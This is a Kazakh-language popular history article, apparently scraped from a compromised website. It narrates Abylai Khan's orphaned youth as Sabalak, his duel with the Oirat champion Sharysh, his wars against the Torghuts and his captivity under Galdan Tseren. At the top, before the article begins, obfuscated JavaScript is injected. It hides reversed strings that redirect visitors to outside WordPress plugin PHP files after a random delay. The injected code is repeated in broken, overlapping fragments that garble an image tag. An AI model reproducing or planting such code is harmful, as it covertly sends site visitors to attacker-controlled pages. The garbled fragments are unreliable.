Даланың дара тұлғасы

Abilay_khan$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/Abilay_khan.jpg» height=»204″ width=»167″ />Биыл қазақтың ұлы ханы — даңқты жеңістерімен, жауынгерлік жорықтарымен тарихта өшпес із қалдырған Абылай ханның 300 жылдығы.   Абылай хан билік жүргізген кезең – қазақ тарихындағы алтын ғасыр.  Абылай ханның билік басына келуі қиын-қыстау заманға тап келеді.  Қандай қиыншылықтарға қарамастан, Абылай хан жалпы қазақ мемлекетінің саяси бірлігін   қалпына келтірген, қазақ елін  ірі  мемлекетке айналдырған хан.

        
Ұлы далада бұрынғының батырлары жайлы талай аңыздар мен қиссалар жырланып келген. Халық олардың есімдерін есте сақтап, ауыздан ауызға, ұрпақтан ұрпаққа жеткізген. Солардың ішінде даңқты жеңістерімен, жауынгерлік жорықтарымен тарихта өшпес із қалдырған Абылай ханды барша халық ерекше қастерлеп, қадір тұтады. Ол – көзінің тірісінде-ақ  әулие атанған санаулы адамдардың бірі. Абылай хан билік жүргізген кезең – қазақ тарихындағы алтын ғасыр.
Абылай ханның билік басына келуі қиын-қыстау заманға тап келеді. Бұл патшалық Ресейдің саяси қысымы күн санап арта түскен кезі еді. Цин-Манчжурия империясы да көрші аймақтарға көз алартып, арам пиғыл танытып отырған шақ болатын. Сонымен бірге шекаралас жатқан ұсақ тайпалармен және ұлыстармен үзіліссіз жүріп жатқан соғыс та Қазақ мемлекетінің тұтастығын едәуір әлсіретті. Өзара ішкі кикілжеңдер ірі ұрыс-таластарға ұласып, ел ішіндегі жағдайды асқындыра түсті.
Осындай қиыншылықтарға қарамастан, Абылай хан жалпы қазақ мемлекетінің саяси бірлігін бірте-бірте қалпына келтіреді.Өз хандығын маңайындағы дұшпандары мен қаскөй көршілері мойындайтындай ірі мемлекетке айналдырды. Оның данышпандығы мен көрегендігі арқасында кең байтақ Ұлы Далада ұзақ уақыт бойы бейбіт заман орнады.
Абылай дәуірінде Қазақстан мемлекетке тән дәстүрлі белгілерге толық ие біртұтас елге айналды.Өзіндік басқару жүйесі, бүкіл елдер мойындаған шекарасы, әлеуметтік жағдайды ұйымдастырудың ерекше тәсілі қалыптасты.
Дегенмен,осындай тарихи ірі тұлғаның өмір жолы оңай болған жоқ. Жасынан өмірдің қиын-қыстау соқпақттарынан өтіп, тағдырдың ауыр сынын басынан кешірді.
Абылайдың шын аты-Әбілмансұр. Ол 1711 жылы арғы тегі Жошы ханнан тарайтын белгілі тұлғалардың шаңырағында дүниеге келді. Көптеген қанды жорықтары үшін қанішер атанған атасы Уәли даңқты әскербасы болған. Өз әкесінің де аты –Уәли. Көрікті, келбетті болғандықтан жұрт оны көркем Уәли деп атап кеткен. Ол-әйгілі заңгер әрі қоғам қайраткері Есім ханның ұрпағы.
Әбілмансұр жетімдіктің зардабын ерте тартады. Он бір жасында әкесінен айырылады. Ел кезіп, қаңғырып жүріп, кейде ашық далаға, кейде қаңыраған қапас қоралар  мен ескі зираттарға түнейді. Сонда оның бойына күш-қуат беріп, тағдырдың тауқыметіне мойынсынбауына көмектескен әрі тіршілік нәрін берген осы Дала топырағы еді. Жападан-жалғыз ұшы-қиырсыз ұзақ жол кешкен ауыр күндерінде де бабалар аруағы оған рух берді. Осындай дала соқпақтары қажымайтын, мұқалмайтын жауынгерлік рухын шынықтырып, оны табанды қайраткер әрі данышпан ретінде тәрбиелейді.
Ертеректе өмірден өткен сарбаздар мен ақындардың суық  мазарларына қонып жатқанында, ол үнемі жұлдызды аспанға қарап, өз шырағын іздейтін.
Тәңірі тілеуін беріп, сол жұлдыз оны Темірбай деген байдың үйіне жолықтырады. Перзентке зар Темірбай жетім баланы асырап алмақ болады. Ол бәйбішесі (үлкен әйелі) екеуі жұпыны киінген, мойнына дорба асынған Әбілмансұрды бастан — аяқ шолып өтеді де:
—    Атың кім сенің? – деп сұрайды.
—    Жұрт мені Сабалақ дейді, — деп жауап береді бала.
Шынында да мына бала Сабалақ десе дегендей: үсті-басы алба-жұлба, жұлым-жұлым кір –қожалақ.
Рақымы мол Темірбайдың үйінде біраз болып, Сабалақ тағы жолға шығады. Сол жолы Балқаш көлінің маңында от басында әңгімелесіп отырған адамдардан өзі ақылды, өзі әділ Төле би туралы естіп қалады. Бұл қарияның ауылы алыс емес екен. Сабалақ осы әңгімеден кейін әйгілі бидің ауылын іздеп келіп, оның түйесін бағуға жалданады.
Уақыт жылжып өтіп жатты. Әбілмансұр терең ойлы, алғыр бала болып өсті.
Ұлы Даланың көптеген елді мекендеріндегідей Төле бидің ауылында да біртүрлі ерекше күй орнаған. Дала ғұрпында өзге байлықтан гөрі рухани байлық жоғары тұратын. Көшпенділер адамды дәулетіне емес, ісіне қарай бағалаған. Отанды сүю, үлкенді сыйлау, ата-баба әруағын қадір тұтып, өсиетіне берік болу қасиетіне үлкен мән берген. Дала аңыздары мен эпостары батырлықты, ерлікті биікке көтеріп, әлемнің бар қазынасынан да қымбат нәрсе туған жер деп санаған. Адамның кіндігінен шыққан алғашқы қан жерге тамады. Содан бастап әрбір адам оның перзенті әрі болашақ қорғаушысы болуы тиіс. Қаншама ер-азамат туған жерін қорғау үшін өлімге бас тіккен. Олардың әр қайсысы көшпенді халықтың жүрегінде мәңгілік сақталған.
Аға ұрпақ ерлігі жайындағы осындай әңгімелерді құлағына құйған Сабалақ ерекше болып өсті. Сонымен қатар хас батырға  тән қайсар күші де шындалды. Бұл кез шашыраңқы қазақ әскеріне сыртқы жаулардың, әсіресе ойраттардың (жоңғарлардың) тегеурініне төтеп беру қиынға түскен шақ еді. Сонда Сабалақ тезірек ер жетіп арғымаққа отыруды, қолына қару алып, соғысуды армандайтын. Тағы бір ойлаған мақсаты атақты сардар, 1710 жылы Қарақұмда өткен халық қалаулыларының жиналысында үш жүздің бас әскербасы болып сайланған Бөгенбай батырмен жүздесу еді.
Он бес жасында Сабалақ Темірбайдың ауылына қайта оралды. Мұндағылар оның бойы өсіп, денесі шымырланып қалғанын байқады. Баяғы кішкентай дала кезер бала емес, батыр тұлғалы жігіт болған, сөзі де, ісі де нық. Темірбай оны көріп қатты қуанады. Қуаныштан жүрегі елжіреген ол өзінің керемет арғымағы-Сарыбастысын сыйлап, батасын беріп, жолға аттандырады.
Бұл жол оны Бөгенбай батырға апарады. Батыр ұрысқа сұранған жас жігіттің жалынды сөзін тыңдап, оны атқосшы, яғни қару-жарақ тасушы етіп тағайындайды. Жас жауынгер өзінің шыққан тегі жайлы, әйгілі ата-бабалары Жошы, Есім, Уәли, Бақы туралы ешкімге сыр білдірмейді. Басқа жауынгерлермен бірге күнделікті жаттығуларын жасап, жауынгерлік машығын шындайды. Әскери өмірді танып білуге ұмтылады. Осы қатал өмір бірнеше жыл өткен соң оның болашақ тағдырын айқындап береді.
Ойраттар 1738 жылы тағы да кенеттен шекараны бұзып, қалың қолмен қазақ жеріне басып кіреді. Бөгенбай батыр жаудың жолын бөгеймін дегенше, бірнеше ауылдарды өртеп те үлгерген. Екі жақтың әскері қарсы жүріп, шаңын алқапта кездеседі. Қарсыластар бірін-бірі бағып үнсіз тұр. Таңғы шапақтан шықтар ақ күмістей жарқырап, батырлардың сауыты жалт-жұлт етеді. Мүлгіген тыныштық тек анда-санда аттардың пысқырынғаны естіледі.
Әрбір халықтың өз таңбасы яғни туы болған. Олар соғысқа ұрандарын айтып, туларын желбіретіп шығатын. Бұл жауынгерлерге рух беретін. Сондай ту осы ұрысқа болашақ хан, әйгілі сұлтан Әбілмәмбетке тапсырылды. Ол белгілі әскербасшылармен алдыңғы сапта еді.
Бір уақытта ойраттардың алдыңғы қатары ортадан жарылды да, алға маңғаздана басып, жараулы атқа мінген алып денелі жауынгер шықты. Қаһарлы ойратты бәрі де бірден таныды. Бұл Шарыш деген ойраттардың жауынгерлік рухының нағыз бейнесі-тін. Ол еш уақытта жеңіліс көрмеген. Шарышпен жекпе-жекке шыққандардың ешбірі тірі қалмайтын.
Қаһарлы ойрат ұзын найзасын сермеп, айғайлап қарсы жақтың жауынгерін жекпе-жекке шақырды. Бөгенбай батыр жолы болғыш ойрат баһадүріне қарсы өзі шықпақ еді. Бірақ, Әбілмәмбет зорға дегенде оны ұстап қалды. Егер Бөгенбай оққа ұшса, не болатыны белгілі ғой. Басшысыз әскердің соғыста жеңіп шығуы екіталай. Әрине, шайқас алдында ең мықтылардың күш сынасуының маңызы зор болғанымен қазақтар мұндай тәуекелге бара алмайды. Не істеу керек?
Шарышпен күш байқасуға  бірталай жігіттер ниет білдірді. Әбілмәмбет пен Бөгенбай шын жүрегінен құлшынған бір жас жауынгерге тоқталды. Жас жігіт:
-Егер мен ойратты жеңсем, осылармен соғыста қаза болған бабаларымның кегін алғаным. Егер өліп кетсем, біздің сарбаздар мен үшін кек алар,-дейді жалындап.
-Ен болмаса, өз атыңды айтшы,-деп қана сұрап үлгерген сұлтанға:
-Сабалақ,-деді де, атын тебініп қалып, қаһарлы жауына қарай беттеді. Жас жігіттің өлімге бас тіккенін түсінген жұрт іштерінен күрсініп қала берді.
Сабалақ Шарышқа қарсы келіп, жебе жетер аралыққа тоқтады. Шарыш алдындағы қарсыласын көріп, қарқылдап кеп күлді де:
-Ей, қазақтар! Араларынан нағыз еркек табылмағаны ма? Мына жас баланы өлімге жіберіп тұрғандарын не масқара?!
Ойраттар даңқты сарбаздарының мына сөзіне еліріп, семсерлерін сартылдатып, гуілдесе жөнелді. Сабалақ ызаға булығып, тістене түсті. Ылғалданған алақанына найзасын қатты қысып, жауына ұмтылды. Жүрегі аттай тулап көзіне қан толды. Қандай екені белгісіз, жас жүрегінің терең түкпіріне «А-бы-ла-а-ай!  А-бы-ла-а-ай!» деген әскери ұран бас көтерді.
Ойрат батыры да осыны күтіп тұрған. Атының шоқтығыны (жалына) жабысып, қатты айғайлай ол да қарсы шапты. Аттылардың арасы жақындай түсті. Екі жақ демдерін іштеріне тарта істің барысын бағып тұр. Отыз қадам қалды, жиырма, он, бес… тарс-тұрс, сатыр-күтір, аттары да, өздері де бір-бірімен  мидай араласып кетті. Әккі шарын дәл жүрекке көздеді. Бірақ Сабалақ соңғы сәтте бұлтарып үлгерді. Ойраттың найзасы жанай өтіп, баланың кеудесіндегі сауытын сөгіп кетті. Ашудан түсі қашқан қарсыласының бет-әлпетін Сабалақ жақыннан көрді. Тіпті оның ыстық демі де сезілді. Одан әрі не істеу қажет екенін біреу сездіргендей болдыма, бала сол сәтте найзаның енді пайдасы жоқ екенін тез түсіне қойды. Беліндегі семсерін суырып алып, бар күшімен ойратты көздеп, сермеп қалды. «Абылай! Абылай!»
деп ұрандауын қоймаған Сабалақтың соңғы көргені Шарыштың домалап бара жатқан басы мен шарасынан шыққан көздері еді. Сәлден кейін естерінен танып  мелшейіп қалған жауынгерлер «жеңілмейтін» ойраттың бассыз  қалған өлі денесінің жерге құлап бара жатқанын байқады. Осы кезде рухы көтерілген қазақ әскерлері Абылайлап ата жауына лап қойды. Алдыңғы көріністен ес жиып үлгермеген ойраттардың тамтығы да қалмады.
Осы оқиғадан соң Сабалақтың аты бүкіл елге жайылады. Шабармандар алыс-алыс ауылдарға қуанышты хабар таратып,есімі де қызық, өзі де беймәлім бір жас баланың керемет ерлік істегенін сүйсіне айтады. Ақындар мен жыраулар оның батырлығын мадақтап, даңқын шығара бастайды.
Қуаныштан көңілі шаттанған Әбілмәмбет сұлтан әлгі жұмбақ батырды шақыртады. Ол туралы Бөгенбай батыр да әркімнен сұрастырып көріп еді, ештеңе шықпады. Өзі де бұрын бұл баланы байқамаған. Бар білетіні-оның атқосшы,  қару-жарақ  тасушы, момын, қарапайым, сыпайы екендігі.
Сұлтан балаң жігітті ұзақ, тәптіштеп тергеуге алды. Ата-анасын, олардың қашан дүние салғанын, кіммен тұрып, қалай қалай өскенін сұрайды.  Әбілмәмбет көбірек білген сайын, өз күдігіне сенімі күшейе түседі. Алдында тұрған Шыңғыспен қаны бір, ұлы Жошы ханның тікелей ұрпағы, әйгілі Қанішер мен Есім ханның мұрагері болып шықты.
-Сабалақ есіміңді ұмыт,-деді сұлтан сөзінің соңында.
-Шын атың- Әбілмансұр. Сені осылайша ата -анаң атаған. Бүгіннен бастап халық Абылай атайтын болады. Өзіңді алда үлкен болашақ күтіп тұр. Халқыңның сенімінен шыға біл. Сонда сені елің де  көкке көтеріп, мәртебеңді  асырады.
Сабалақтың тағдыры осы жерде аяқталады да, Абылай ханның ұлы тарихы басталады.

Соғыс жылдарында

Күндер зымырап өтіп жатты. Уақытпен жарыса талай оқиғалар келіп, талай оқиғалар ауысты. Қазақ әскері бұрынғы жерлерін қайтару, елдің біртұтастығын сақтау мақсатында толасыз соғысты бастан кешті. Ол шақта еркін даланы бағындырып, салық салғысы келген арам ойлы жау көп еді. Олардың ішінде ойраттар ғана емес, Еділ өзенінің маңындағы қалмақтар, қарақалпақтар мен жоңғарлар, өзбек әміршілері мен қырғыз манаптары, манчжур-қытай басқыншылары да бар болатын.
Абылайдың қол астында жауынгерлік іске әбден машықтанған, шыныққан әскері болды. «Абылай» олардың дәстүрлі ұранына айналды. әрбір майданға «Абылайлап» шыққан әскер жеңіссіз қайтқан емес. Тығырыққа тірелген ең қиын жағдайларда жас көсем жол тауып шыға білді. Абылайдың есімі жеңістің белгісіндей болды.
Соғыс ауыртпашылығын жігіттерімен бірге көтерген Абылай не болса да көппен көретін әдетінен ауған жоқ, Ол қарапайым әрі ыңғайлы киінді. Ат үстінде ұйықтап,неше күн дәмсіз, нәрсіз жүруге үйренді. Кешке қыр басына шығып, отты алаулатып жағып қойып, ата-баба ерлігін паш ететін бұрынғының аңыздарын тыңдағанды жақсы көрді. Әсіресе, оны Бұқар жырау, Қаз дауысты Қазыбек сияқты ақындар мен ақсақалдар шерткен әңгіме қызықтыратын.
Абылай кез келген той-думан, мереке-мейрам кезінде ұйымдастырылатын жарыстардан, қызықты ойындардан тыс қалмайтын. Палуандармен күреске түсе кетіп, күш сынасатын. Еш уақытта күресті жеңіссіз аяқтамайтын Абылай қарсыласына әділ күрескені үшін ризашылығын білдіретін.
Осылайша Абылайдың әскери тәжірибесі де байи түседі. Көптеген майдандарда оның көрегендігі, алысты болжағыштығы шыңдалады. Тіпті ел ішінде Абылай жаудың әрбір қадамын, олардың не ойлап, не істегелі жатқанын алдын ала біліп, көріп отырады деген аңыз да тарап кетеді. Халық алла тағала Абылайды әдейі Ұлы Далаға көз алартқан, арам пиғылды жауларынан тазартып, үш жүзге бөлінген барлық рулар мен тайпалардың басын біріктіруге жіберген деп ойлаған. Шынында да дәл солай болды. Халықтың ойы бір жерден шығып, айтқаны орындалды.
Нағыз әскербасшысы Абылай қарамағындағыларды руына қарап бөлмеді. Ақсүйек пе, қара ма-оған бәрібір еді.
Ол:
-Бәріміздің қанымыз бір. Ең бастысы жүрегің не деп соғады? Байлық үшін емес, туған елің, туған жерің үшін күресіп, жүрегіңнің тазалығын көрсет,-дейтін.
Жігіттер де Абылайды барынша сыйлап, төбелеріне көтерді. Онымен бірге өлімге бас тігуге дайын тұрды. Себебі ол ерлік майданын бос ұранмен бастаған жоқ, өзі үнемі алдыңғы шепте жүріп, өнеге көрсетті. Жекпе-жекке де өзі бірінші болып ұмтылды. Қай сайданда болсын, Абылай ұрыстың ең қайнаған жерінен табылды. Еш уақытта жауына ішін беріп көрген емес. Бабалар аруағы да оны үнемі қолдап, қоршап жүрді. «батырды құдай сақтайды» деген нақыл сөз осыған байланысты айтылса керек.
1740 жылы солтүстік-батыстағы шекараны нығайту қажет болды. Өйткені Еділ маңындағы қалмақтар сол маңайға көп әскерін шоғырландырды. Осыған қарағанда қалмақтар шекараны бұзбақ ниеттерін жасырмаған. Қалмақтармен соғысқа Абылай көбіне Әбілқайыр ханмен шығатын. Бұл жолы Әбілқайыр өз орнына Ералы деген ұлын аттандырады. Ондағы ойы-жас сұлтан Абылаймен бірге жүріп, өмір көрсін, майдандарда шынығып, шыңдалсын дегені.
Көктем шыға Абылай Кіші жүз бен Орта жүзден құралған әскерді бастап жорыққы шығады. Қалмақ (торғауыт) әскерінің жай-күйінен хабардар болып алған ол алдағы соғыстың жоспарын тиянақты құрып қояды. Торғауыттардың өздерінен артықшылығын, жақсы қаруланғанын, яғни зеңбіректері бар екенін де біледі. Мұндай жағдайда оның сарбаздары алыс қашықтықтан соғысуға мәжбүр болмақ. Себебі алысқа ұшқан зеңбіректің оғы қалмақтармен тең дәрежеде шайқасуға қиындық туғызады. Бірақ Абылайдың мерген садақшыларының зеңбірекшілерді орта қашықтықтан атып жойып жіберуіне мүмкіндігі бар. Алайда торғауыттар да оңай берісе қоймас. Оларда өте тәжірибелі жауынгерлер және қазақтардың мықты жағын жақсы білетін еді. Сол себепті соғысқа зеңбіректермен қаруланып шыққан. Зеңбіректерді түйенің үстіне бекіткен. Өз күшінің басымдылығына сенімді торғауыттар шешуші сәтті осылай күтіп тұрған.
Абылай тосын айла табу қажет екенін түсінді. Жалаң қолмен және құр кеудемен қалмақтарды ала алмайсың.
Енді неге де болса бел буған Абылай жауынгерлерімен түн жамылып Жайықтың оң жақ жағалауына өтіп, күтпеген жерден торғауыттардың үстінен шығады. Күзеттегілер қалғандарына белгі беріп үлгермейді. Олар естерін жиып болғанша, қазақтың атты әскері дөң устінде садақтарын кезеніп, қылыштарын жалаңдатып соғысқа дайын тұрды. Күзетте тұрған жауынгер белгі беру керек екенін енді есіне түсіргені сол еді, «Абылайлаған!» ұран мен жебелердің ысқырығы, жүздеген, мыңдаған тұяқтардың дүбірі үрейін алды. Шатырларынан атып-атып шығып аттарына қарай жүгірген қалмақтар бәрібір кеш қалды. Жолындағыны селдей жайпаған Абылай әскері көзді ашып-жұмғанша торғауыттың күл-талқанын шығарды. Жайықтың суы қызыл қанға боялып, қалмақтардың ыңырсыған, ышқынған дауыстары оның буырқанған толқынына көмілді.
Торғауыттар мұндай масқараны бұрын-соңды бастан кешпеген еді. Қанатты ақ боз атқа мінген салт атты кейпіндегі адам түстеріне кіріп шошынып, «Абылайлаған!» ұран өмір бойы құлақтарына сіңіп, мәңгі естерінде қалды. Әлгі кісінің астындағы аты орасан зор боп көрінді. Екі қанаты жайылғанда даланы тұтас жауып, құтырынған жел мен нөсерлеткен жауыннан, от шашқан найзағай мен тасырлаған бұршақтан қорғап тұрғандай болды.
Қалмақтардың аман қалғаны жан сауғалап, Нарын  құмына қашып барып тығылды. Абылайдың жаңа жеңісі туралы хабар сол сәтте-ақ Ұлы Даланы шарлап кетті. Енді даңқты қолбасшының ордасына тіпті башқұрттар да елшілерін жібере бастады. Олар бұл кезде Ресейдің жазалаушы әскерімен соғыс жүргізіп жатқан. Башқұрттар Абылайды өздерінің ханы етіп көтеруге де дайын еді. Тек оларға жақтасса болды. Алайда күтпеген жерден Әбілқайыр ханның өлімі туралы қайғылы хабар жетеді де, Абылай мен Ералы торғауыттардың ізін кесуді тоқтатып, әскерін кері бұрады. Әбілқайырдың үлкен әйелі-Бопай ханшаның ордасына қарай жол тартады.
Абылайдың тегеурінінен бас көтере алмайтындай халге ұшыраған қалмақ әміршілері осылай қазақ ауылдарына бүлік салуын қояды. Отыз жыл өткен соң ғана, 1771жылы, Абылай ескі жауларымен бетпе-бет тағы кездеседі. Бірақ оған дейін талай оқиға өтеді
Соғыс аяқталып, арасында сәл тынығатындай жағдай туды. Осы сәтті пайдаланғысы келген Абылай аңға шығуға дайындалды. Бұған ауылға жақын маңда тау ешкілері жүргендігі туралы жігіттерден естіген әңгімесі де себеп болды. Аңға сайланған Абылай бұл жолы бүркітін тастап, садақпен ғана жеңіл қаруланды. Кейінгі кездерде ортаазиялық базарларда кішкене ши мылтықтар сатыла бастаған және мұндай қару Абылайда да бар еді. Бірақ ол мылтықтан гөрі кәдімгі көшпенділер садағымен аңшылық құрғанды ұнататын.
Абылай аздаған нөкерлерімен бір асудан өте бергені сол еді, бұта арасынан шыққан аң ізіне тап болады. Кез-келген көшпенділер сияқты Абылай даланың түкпір-түкпірін бес саусағындай білетін. Ол құрғақ топыраққа терең кірген тұяқтардың іздері мен ағаштың жоғарырақ тұсындағы сынған бұтақтары тау текенің бойы биік, салмағы ауыр екенін аңғартты. Сәл жүре бере, тағы да бір топ жануардың іздерін байқайды. Мұны көрген Абылай бұрынғысынан да қызынып кетті. Тау ешкілерінің ішіндегі текесі шындығында да қолға түсе бермейтіндей ерекше ірі екен. Мүйіздері жуан, иірлене артқа қайырылған. Түгі, әсіресе мойын тұсының жүні қалың әрі ұзын. Басын қайқайтып, жан-жағына маңғаздана қарайды.
Аң болса жайбарақат күйі қасынып әлі тұр. Бір сәтке Абылай мынадай ерекше жануарды ту сыртынан тығылып атуды әділетсіздік санады. Тасадан атып шығып, дыбыс шығарып еді, теке де тұрған жерінен орғып-орғып, үйірінің соңынан шаба  жөнелді. Алайда жарыса ұшқан сұр жебе де суылдап жетіп, қайран жануардың жауырынына қадалды. Теке соңғы күшімен бір-екі секіріп барып, омақаса құлады. Абылай тауға көтеріліп, текені иығына салып алып, үлкен олжамен қосына қайтты.
Аң еті қаттылау болып піссе де, оған мән берген ешкім жоқ. Қолма-қол жеп, тауысып қойды. Ішке ел қонған соң, әрі оттың қызуынан, әрі күні бойы жүрістен шаршаған жауынгерлер маужырай бастайды. Күзетке екі жігітті қойып, қалғандары ұйқыға кіріседі.
Абылайдың түсіне туған жері-киелі Көкшетау, ондағы күміс той жарқыраған мөлдір сулы көлдер, сынсыған ормандар кірді. Ол Оқжетпестің ұшар басына шығып жүр екен. Кенет қолдары қыран құстың қанатына айналып, үсті-басын қауырсын басып кетеді. Көзінің қырағылығы бұрынғыдан да артады. Бір уақытта Абылай бүркітке айналып, көкке самғап көтеріледі. Аспаннан қарағанда жер алақанда тұрғандай көрінеді. Биікке самғап ұшқан Абылай-бүркіт маңайға мұқият көз салды. Біресе әр жерден алаулаған от көрінді, біресе мамыражай жайылып жүрген қойларға қасқыр шауып, біресе тыныш жатқан елді беймәлім аңдар талап жатты. Бүркіт қанатын кең жайып, қаһарлы бұлттарды айдап келді. Күн күркіреп, жаңбыр жауып жердегі өртті сөндіре бастады. Абылай-бүркіт енді қасқырларға ұмтылды. өткір тырнақтарымен бүріп, мылжа-мылжасын шығарды. Ең ақырында аспанға үшінші рет көтерілгенде, көкжиектен айдаһарды көрді. Ол аузынан от шашып, маң-маң басып жолындағы ауылдарды өртеп барады. Бүркіт айдаһарға қарсы ұшты. Кенет қанаттары ауырлап басы айнала бастады. Мойнына біреу арқан салып, ұшуға мұрша бермей, төмен тартатындай. Қатты қиналғанда күш беретін ата-бабасының аруағын шақырып айғайлайын десе дауысы шықпайды. Суық терге малынған Абылай түршігерлік сұмдық оқиғаны көреді. Ойраттар дыбыстарын сездірмей ұйқыдағы қамсыз жігіттерді шетінен бауыздап жүр екен.
«Абылайлап!» қасында жатқан семсеріне ұмтылды. Оянып үлгергендері найза, істіктерін дайындап бір-біріне арқаларын беріп тұра қалды.   Аман қалғаны төртеу-ақ, ойраттар отыз шақты. Бұл ойраттардың барлаушылар жасағы болып шықты. Олар кештен бастап-ақ тау етегіндегі отты көріп, қазақтардың ұйықтауын күткен. Қалғып кеткен күзетшілерді таң ата жойған. Айнала қаптаған өлік. Аман қалған екеуі бір-біріне арқасын беріп тұрып шайқасуда. Демдерін ауыр алып, жауларына өшіге қарайды. Қазақтарды тірілей ала-алмасын білген нойан үлкендеріне жүгіріп барып, Абылай жақты саусағымен нұсқап қойып, бірдеңелерді айтып жатты. Көсемдері көздерін сығырайта Абылайға қарап тұр. Ол Абылайдың қолынан ру тайпасы бейнеленген жүзікті көрді. Мұндай жүзікті тек ақсүйектер ғана тағатын. Осыдан соң аз тыныштық орнады. Бір кезде жебенің суылдаған ысқырығы естілді. Абылай қасындағы соңғы серігінен де айырылғанын сезді. Нойандар жалғыз қалған Абылайдың үстіне торды лақтырып жіберіп жабыла кетті.
Ойраттар тұтқынға түскен Абылайды байлап-матап, ұрып-соғып, әміршілеріне жеткізді. Жанары ызаға толы Абылай орнынан тұрып, жан-жағына қарайды. Қарсы алдында биік тұғырда белгілі ойрат қонтайшысы Қалдан-Серен отыр. Маңайына текті көсемдері жайғасқан. Әміршінің бас ордасы асқан дәулетімен жарқырап тұр. Айналаға қалың түкті парсы кілемдері жайылған, бос жер жоқ. Алтынмен апталып, қымбат тастармен безендірілген қару-жарақтар әр тұста шашылып жатыр. Қабырғаға ілінген аю мен қасқыр терілері азу тістерін ырсита қарайды.
Қалдан-Серен де Абылайды бірден танып, өшіккен көздерімен шолып өтті.
-Қалай, қазақ жауынгері, қолға түстің бе?- деді тісінің арасынан ысылдап. – Осы сәтті мен қанша күттім. Менің ұлым – Шарышты өлтірген сен бе? Жауап бер!
Маңайындағылар:
-Иә, иә, Шарышты өлтірген осы! – деп шулап қоя берді.
-Шарыш ең мықты жауынгер еді!
-Терісін басына қаптау керек!
-Төрт аттың құйрығына байлаңдар!-деген айғайлар жан-жақтан естіліп жатты.
Қалдан-Серен қолын жоғары көтерді. Отырған ойраттар жым-жырт бола қалды да, бәрі Абылайға тесілді.
-Сенің ұлыңды өлімге кескен – менің халқым,-деді салмақпен Абылай. –Мен тек үкімді орындадым. Халқыма қастандық жасаған адм өз сазайын тартады.
Мұндайды күтпеген ойраттардың тілі байланып қалды. Абылайдың мына сөзі намыстарына тиді. Біреулері орындарынан ұшып тұрып, семсерлеріне жармасты. Қалдан-Серен белгі берсе болды, Абылайды сол жерде талап тастамақшы. Алайда әмірші асықпады, ол Абылайды бастан-аяқ барлап қарады. Абылайда міз бақпастан маңайын бақылып тұра берді.
-Әкетіңдер!-деді әмірші.
-Иә, Абылай тегін адам емес,-деп ойлады ол өз ордасында отырып,-Ол өлімнен қорықпайды, ол оның  талайын көрген.
Ол үшін ең қорқыныштысы — тұтқында қалу. Алтыннан болса да тордың аты-тор. Ал Абылай-қазақтардың биік рухы. Сондықтан осы рух менде аманат (тұтқын) болғаны дұрыс. Оны өлтіруге болмайды. Қайғы жаудың өзін біріктіреді. Абылай олардың туы болып, кек алуға келері сөзсіз…  Жо-оқ, өлтіруге болмайды, одан да айырбас жасағанымыз пайдалы шығар…
Жападан-жалғыз өзімен-өзі кеңескен әмірші осындай ойға тоқталады. Бұл кезде күзетшілер Абылайдың қолын артына қайырып байлап, ескі лашыққа алып келеді. Өздері  есікті күзетіп қалады.
Кенет есіктің жапқышы ашылып, ішке екі адам кірді. Біреуінің қолында пышағы бар. Сол кісі арқа тұсына жақындағанын сезгенде, Абылайдың денесі мұздап кетті. «Біткен жерім осы шығар»,-деген ой келіп, көзін жұмды. Күзетші Абылайдың қолын байлаған кендір арқанды кесіп, жіберді де, оны алға итеріп қалды. Тірі қалғанына сенер-сенбесін білмей, ісінген қолдарын уқалап, Абылай сыртқа шықты. Екі нойан оны төбе үстіндегі аппақ киіз үйге бастап алып келіп, төрге шығарды. Қонақтарға арналған бұл үй үлкен болып көрінді. Бірнеше бөлікке бөлінген. Үйдің ішіндегі жиһаздар көздің жауын алады. Көрші бөлмеден көрікті келген бір жас қыз шықты.
-Бұл енді сенің үйің,-деді ақырында екі күзетшінің бірі.
-Сен біздің қонақсың. Ал мынау — әйелің. Осында тұрасың. қашамын деп ойлаушы болма, өлесің.
Осыны айтқан күзетшілер сыртқа шығып кетті. Абылай аңқиып ойрат қызға қарады. Қыз иіліп, екі қолымен тостаған ұсынып жатып:
-Сіз жолдан шаршаған шығарсыз, қымыз ішіңіз,-деді жуас үнмен.

Абылайдың өмірдегі асыл арманы-Ұлы Даланың азат та еркін, біртұтас та тәуелсіз болуын көру. Туған халқының өз жерінде емін-еркін өмір сүріп, сәбилердің бақытты келешегін құру. Ұлы Даланың ұрпақтан-ұрпаққа мұрағат етіп қалдыру. Осындай ізгі мақсаттары үшін ол тағдырдың барлық ауыртпалығын жеңуге тырысты. Бар өмірін ұлы арманын іске асыруға арнады.
Әбілмәмбеттің Абылайды босату шарттары туралы ойраттармен жасаған келісімінің үлкен себебі тиді. Сөйтіп 1740 жылы тамыз айында Абылай еліне оралды. Тірі әулиені, жау тұтқынынан аман-есен босанған батырды көреміз деген ел-жұрты ауылына ағылып келіп жатты. Сол заманда тұтқында  мәңгі қалу масқара сондықтан өзіне тиімсіз болса да, Әбілмәмбет ойраттармен шарт жасасуға мәжбүр болды. Бұл келісім шарттағы ең басты мәселе — Абылайды құтқару. Әйтпесе өз бостандығы үшін Ресейге қарыздар боп қалмақ еді.
